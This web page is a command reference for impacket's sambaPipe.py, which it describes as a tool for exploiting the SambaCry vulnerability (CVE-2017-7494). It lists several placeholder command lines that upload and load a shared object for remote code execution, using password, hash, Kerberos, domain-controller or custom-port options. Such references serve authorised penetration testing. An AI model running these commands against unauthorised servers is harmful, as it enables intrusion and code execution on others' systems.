logo
Free, unlimited AI code reviews that run on commit
git-lrc git-lrc GitHub Install Now We'd appreciate a star git-lrc - Free, unlimited AI code reviews that run on commit | Product Hunt git-lrc - Free, unlimited AI code reviews that run on commit | Product Hunt

Samba Exploit - RCE with SambaCry | Online Free DevTools by Hexmos

Exploit SambaCry vulnerabilities with sambaPipe.py. Achieve Remote Code Execution (RCE) on vulnerable Samba servers using shared object (SO) files. Free online tool, no registration required.

sambapipe-py

Exploit CVE-2017-7494 (SambaCry) to upload and load a shared object (SO) file on a vulnerable Samba server for remote code execution. More information: https://github.com/fortra/impacket.

  • Upload and load a shared object file on a vulnerable Samba server:

sambaPipe.py -so {{path/to/file.so}} {{domain}}/{{username}}:{{password}}@{{target}}

  • Authenticate using NTLM hashes instead of a password:

sambaPipe.py -so {{path/to/file.so}} -hashes {{LM_HASH:NT_HASH}} {{domain}}/{{username}}:{{password}}@{{target}}

  • Use Kerberos authentication for the target:

sambaPipe.py -so {{path/to/file.so}} -k -no-pass {{domain}}/{{username}}:{{password}}@{{target}}

  • Specify a domain controller IP for authentication:

sambaPipe.py -so {{path/to/file.so}} -dc-ip {{dc_ip}} {{domain}}/{{username}}:{{password}}@{{target}}

  • Use a custom port for the SMB connection:

sambaPipe.py -so {{path/to/file.so}} -port {{port}} {{domain}}/{{username}}:{{password}}@{{target}}

See Also

Filing
Filing PNG Icons
TLDR
Control sambapipe - execute commands Tldr
Man Pages
Domain Man Pages
Password
Password PNG Icons
Target
Target PNG Icons
Man Pages
Path Man Pages
Man Pages
CURLOPT_TLSAUTH_USERNAME Man Pages
Man Pages
porting Man Pages
Installerpedia
digininja/DVWA Installerpedia
← Back to common commands← tldr🙏  Credits & Acknowledgments